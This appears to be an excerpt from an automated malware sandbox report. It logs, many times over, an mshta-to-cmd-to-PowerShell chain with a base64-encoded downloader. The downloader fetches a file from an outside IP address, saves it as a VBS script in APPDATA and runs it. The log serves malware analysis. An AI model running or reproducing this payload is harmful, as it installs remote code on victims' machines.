iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Suspicious command line found
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRF